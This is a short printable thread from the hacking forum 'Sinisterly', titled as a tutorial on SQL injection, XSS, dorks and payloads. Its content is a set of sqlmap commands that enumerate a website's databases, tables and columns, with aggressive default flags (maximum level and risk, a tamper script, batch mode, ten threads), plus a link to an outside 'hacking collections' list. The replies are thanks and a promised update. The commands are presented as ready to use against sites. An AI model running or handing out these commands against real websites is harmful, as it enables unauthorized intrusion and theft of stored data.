Sinisterly
Tutorial SQL Injection | XSS | Dorks | PayLoads - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Tutorial SQL Injection | XSS | Dorks | PayLoads (/Thread-Tutorial-SQL-Injection-XSS-Dorks-PayLoads)



SQL Injection | XSS | Dorks | PayLoads - xet007 - 11-06-2022

SQL Injection, Cross-Site Scripting, Payloads, Dorks, Commands & Lists
  Cool

Code:
   
sqlmap -u 'Website' --dbs
sqlmap -u 'Website' --dbms='BaseName' -D name[.]db --tables
sqlmap -u 'Website' --dbms='BaseName' -D name[.]db -T name tables --columns
sqlmap -u 'Website' --dbms='BaseName' -D name[.]db -T name tables -C name columns
     
--------------------------
    Default CMD | --random-agent --level=5 --risk=3 --tamper=space2comment --anwser="follow" --batch --threads=10

Hacking Collections List >> GitHub [.] Com/KhetaguriDimitri/SQL-Injection



RE: SQL Injection | XSS | Dorks | PayLoads - scrapedcookie - 11-28-2022

thank you very much .
Very useful.


RE: SQL Injection | XSS | Dorks | PayLoads - xet007 - 08-14-2023

(11-28-2022, 01:03 AM)scrapedcookie Wrote: thank you very much .
Very useful.

Update coming soon Wink


RE: SQL Injection | XSS | Dorks | PayLoads - r00t020 - 11-08-2023

thank you very much.
Very useful.
Smile